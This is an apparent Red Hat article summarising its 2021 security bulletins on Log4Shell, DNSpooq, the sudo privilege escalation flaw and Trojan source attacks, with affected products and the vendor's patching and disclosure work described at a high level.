Red Hat strives to provide top customer value and support, including helping our customers manage risks associated with major vulnerabilities via Red Hat Security Bulletins. Some of the major vulnerabilities we addressed in 2021 include:
- Apache Log4Shell
- Sudo privilege escalation
- Trojan source attacks
Red Hat Security Bulletins contain the most current information on new vulnerabilities, diagnostic tools, and updates and fixes for new product releases. Customers can use this information to make risk-based decisions on their environment.
For a list of all major security incidents, visit the Security Bulletins page.
Red Hat Security Bulletin #1: Apache Log4Shell vulnerability
The Log4Shell (CVE-2021-44228) vulnerability shook the IT world at the end of 2021. This Critical security flaw allowed attackers to easily compromise vulnerable application services with a simple malicious code attack using injection tactics.
The Log4Shell vulnerability was one of the most severe vulnerabilities in the history of information security. The severity of this vulnerability was due to the widespread use of the Log4J tool and the simplicity of the attack.
JavaTM is in many digital systems, front ends, products, appliances, and services. When a Java program needs logging, the Log4J tool is a widely used solution. This vulnerability could easily affect most Java software that made use of Log4J. This flaw affected all versions of Log4J version 2 prior to version 2.15.0.
While the initial Log4Shell was indeed a critical issue, there were seven different Log4J vulnerabilities discovered after the initial CVE was reported. These additional vulnerabilities also affected Log4J version 1, which the Apache Software Foundation stopped supporting seven years ago.
Red Hat delivered Critical CVE updates for affected products in three business days, addressing the issue more quickly and accurately. Red Hat also treated the seven subsequent vulnerabilities across multiple products and versions as part of the major security incident, regardless of the severity levels assigned to the subsequent CVEs, and provided patches for Log4J version 1. All patches shipped by Red Hat are fully supported.
Red Hat Security Bulletin #2: DNSpooq
Dnsmasq, a DNS and DHCP toolbox software widely used within specific virtual environments and in small networks, was affected by seven security issues (CVE-2020-25681, CVE-2020-25682, CVE-2020-25683, CVE-2020-25684, CVE-2020-25685, CVE-2020-25686, CVE-2020-25687), branded collectively as DNSpooq.
Moshe Kol and Shlomi Oberman from JSOF discovered the vulnerabilities. Red Hat, CERT/CC, Cisco, Google, and the Pi-Hole incident response teams supported the disclosure coordination and the release of vulnerability information.
- This vulnerability affected the following Red Hat products:
- Red Hat OpenStack® Platform 10
- Red Hat OpenStack Platform 13
- Red Hat Virtualization 4.3
- Red Hat Virtualization 4.4
- Red Hat OpenShift® Container Platform 3.11
- Red Hat Enterprise Linux® 7
- Red Hat Enterprise Linux 8
A remote attacker could execute code on the victim machine through one of two vulnerabilities: CVE-2020-25681 and CVE-2020-25682. The other vulnerabilities allowed the execution of a DNS cache poisoning attack. Red Hat analyzed the attack surface and the component usage in each affected product to rate the vulnerability. This consideration provided precise information for our customers, such as mitigations that they could apply in affected products to reduce or eliminate the risk introduced by these flaws.
Red Hat Security Bulletin #3: Sudo privilege escalation vulnerability
Another vulnerability that received a high level of attention in January 2021, was a sudo flaw (CVE-2021-3156) that was originally introduced in July 2011.
The attacker could cause memory corruption by exploiting a faulty parsing of command-line parameters, leading to a crash or privilege escalation. An attacker needs local shell access to the system to exploit this vulnerability.
Because the sudo package is installed by default on all Red Hat Enterprise Linux systems and allows users to execute commands as other users, most commonly root, Red Hat Product Security has classified this flaw as having a severity rating of Important. Red Hat provided a systemtap-based mitigation and quick updates for our potentially affected products within the Red Hat portfolio.
The sudo flaw potentially affected the following Red Hat product versions and containers:
- Red Hat Enterprise Linux 6
- Red Hat Enterprise Linux 7
- Red Hat Enterprise Linux 8
- Red Hat OpenShift Container Platform 4
- Red Hat Virtualization 4.3 and 4.4
- Red Hat OpenShift Container Storage 4
Red Hat Security Bulletin #4: Trojan source attacks
In late 2021, Red Hat published a Security Bulletin on the Trojan source attacks (CVE-2021-42694), also known as BiDi. This issue introduced a new source code and supply chain attack scenario, where the behavior of the software and the expectations from the source code do not match. In this attack, source code reviewed by a human would be different from the software, which is generated by the compiler.
Red Hat led a massive disclosure coordination effort between several Linux distributions, upstream projects, and standard working groups. We discussed the scope of the vulnerability, shared and worked on our scanning and detection script with them, and helped design patches for the issue.
Red Hat not only scanned our codebase and internal infrastructure, but for the first time, we also made our detection script available on GitHub for community collaboration. Other Linux distributors and several upstream projects used this detection script to scan their code and within their CI/CD pipelines. Red Hat also led efforts to fix the GNU Compiler Collection (GCC) to detect special characters in code and coordinate with other language projects.